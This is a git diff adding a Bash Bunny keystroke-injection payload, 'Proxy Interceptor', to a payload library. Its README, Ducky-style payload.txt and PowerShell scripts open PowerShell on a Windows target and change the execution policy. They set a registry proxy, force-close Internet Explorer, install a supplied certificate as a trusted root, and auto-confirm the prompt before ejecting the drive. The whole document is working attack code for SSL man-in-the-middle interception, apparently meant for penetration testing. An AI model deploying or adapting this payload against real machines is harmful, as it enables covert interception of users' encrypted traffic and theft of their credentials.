diff --git a/payloads/library/Proxy_Interceptor/ImportCert.ps1 b/payloads/library/Proxy_Interceptor/ImportCert.ps1 new file mode 100644 index 00000000..d4612cb0 --- /dev/null +++ b/payloads/library/Proxy_Interceptor/ImportCert.ps1 @@ -0,0 +1,6 @@ +#Import variables from vars.ps1 for use. +. .\vars.ps1 + +#Add certificate to certificate store +$certFile = ( Get-ChildItem -Path $certName ) +$certFile | Import-Certificate -CertStoreLocation cert:\CurrentUser\Root \ No newline at end of file diff --git a/payloads/library/Proxy_Interceptor/README.md b/payloads/library/Proxy_Interceptor/README.md new file mode 100644 index 00000000..e8976216 --- /dev/null +++ b/payloads/library/Proxy_Interceptor/README.md @@ -0,0 +1,30 @@ +# Proxy Interceptor for Bash Bunny + +Author: NightStalker + +Version: 1.0 + +## Description + +This payload will enable a proxy and import an SSL certificate to a Windows +computer for Internet Explorer and Chrome (FireFox is in progress for 2.0) +The script uses a combination of Ducky Code and PowerShell. + +*Note: Currently no falure LED, if remains red for more than 60 seconds +script failed. Will build checks in later version. + +## Requirements + +Certificate needs to be in .pem format and in the root switch directory with +payload.txt, set the certificate and proxy information in the vars.ps1 file. + +## STATUS + +| LED | Status | +| ---------------- | ------------------------------------- | +| White (blinking) | Script Running. | +| Purple (blinging)| Script Complete. | + +## Discussion + +https://forums.hak5.org/index.php?/topic/40476-payload-proxy-interceptor/ diff --git a/payloads/library/Proxy_Interceptor/SetProxy.ps1 b/payloads/library/Proxy_Interceptor/SetProxy.ps1 new file mode 100644 index 00000000..74458979 --- /dev/null +++ b/payloads/library/Proxy_Interceptor/SetProxy.ps1 @@ -0,0 +1,19 @@ +#Import variables from vars.ps1 for use. +. .\vars.ps1 + +#Change the Execution Policy to RemoteSigned and see if Internet Explorere is running and if so close it. +Set-ExecutionPolicy RemoteSigned -Scope CurrentUser +$ieProcess = Get-Process iexplore -ErrorAction SilentlyContinue +if ($ieProcess) { + $ieProcess.CloseMainWindow() +Sleep 5 +if (!$ieProcess.HasExited) { + $ieProcess | Stop-Process -Force + } +} +Remove-Variable ieProcess + +#Change the proxy settings in the registry +$regKey="HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings" +Set-ItemProperty -path $regKey ProxyEnable -value 1 +Set-ItemProperty -path $regKey ProxyServer -value $proxyVal \ No newline at end of file diff --git a/payloads/library/Proxy_Interceptor/cert.pem b/payloads/library/Proxy_Interceptor/cert.pem new file mode 100644 index 00000000..c0bfbec0 --- /dev/null +++ b/payloads/library/Proxy_Interceptor/cert.pem @@ -0,0 +1,4 @@ +-----BEGIN CERTIFICATE----- +REPLACE WITH CORRECT VALID PEM FORMAT CERTIFICATE +FROM PROXY FOR SSL INTERCEPTION. +-----END CERTIFICATE----- diff --git a/payloads/library/Proxy_Interceptor/payload.txt b/payloads/library/Proxy_Interceptor/payload.txt new file mode 100644 index 00000000..b5e180f9 --- /dev/null +++ b/payloads/library/Proxy_Interceptor/payload.txt @@ -0,0 +1,65 @@ +#!/bin/bash +# +# Title: Proxy Interceptor +# Author: NightStalker +# Version: 1.0 +# +#This payload will enable a proxy and import an SSL certificate to a Windows +#computer for Internet Explorer and Chrome (FireFox is in progress for 2.0) +#The script uses a combination of Ducky Code and PowerShell. +# +# Set proxy and certificate varaibles in vars.ps1, certificate must be in same folder as payload.txt +# +# Red Blinking.............Running Payload +# Purple Blinking .........Payload Completed + +#Set Red LED to indicate Starting of Script +LED R 50 + +#Set ATTACKMODE to HID and Storage to be able to transfer the certificate +ATTACKMODE HID STORAGE + +#Import Bunny Helpers +source bunny_helpers.sh + +#Start of Script +Q DELAY 6000 +Q GUI r +Q DELAY 100 +Q STRING POWERSHELL +Q ENTER +Q DELAY 100 + +#Change to the directory of the Bunny with the proper switch location +Q STRING \$driveLetter = \(gwmi win32_volume -f \'label\=\'\'BashBunny\'\'\'\).Name +Q ENTER +Q STRING \$absPath = \$driveLetter\+\'payloads\\\'\+\'$SWITCH_POSITION\'\+\'\\\' +Q ENTER +Q STRING cd \$absPath +Q ENTER +Q DELAY 500 + +#Set the proxy in the internet settings in the registry (For IE and Chrome). +Q STRING powershell -ExecutionPolicy RemoteSigned ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\SetProxy.ps1')" +Q ENTER +Q DELAY 500 + +#Import the certificate to the computer (for IE and Chrome). +Q STRING powershell -ExecutionPolicy RemoteSigned ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\ImportCert.ps1')" +Q ENTER +Q DELAY 1000 +Q ALT y +Q DELAY 500 + +#Unmount the USB Drive. +Q STRING \$driveEject = New-Object -comObject Shell.Application +Q ENTER +Q STRING \$driveEject.Namespace\(17\).ParseName\(\"\$driveLetter\"\).InvokeVerb\(\"Eject\"\) +Q ENTER +Q DELAY 500 +Q ALT t +Q DELAY 500 +Q STRING EXIT +Q ENTER +sync +LED R B 100 diff --git a/payloads/library/Proxy_Interceptor/vars.ps1 b/payloads/library/Proxy_Interceptor/vars.ps1 new file mode 100644 index 00000000..9f2ffa59 --- /dev/null +++ b/payloads/library/Proxy_Interceptor/vars.ps1 @@ -0,0 +1,3 @@ +#Set variables for use in payload. +$proxyVal = "proxyip:port" +$certName = "cert.pem"